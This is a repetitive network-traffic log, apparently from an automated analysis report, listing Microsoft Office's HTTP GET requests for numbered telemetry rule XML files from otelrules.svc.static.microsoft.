              Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
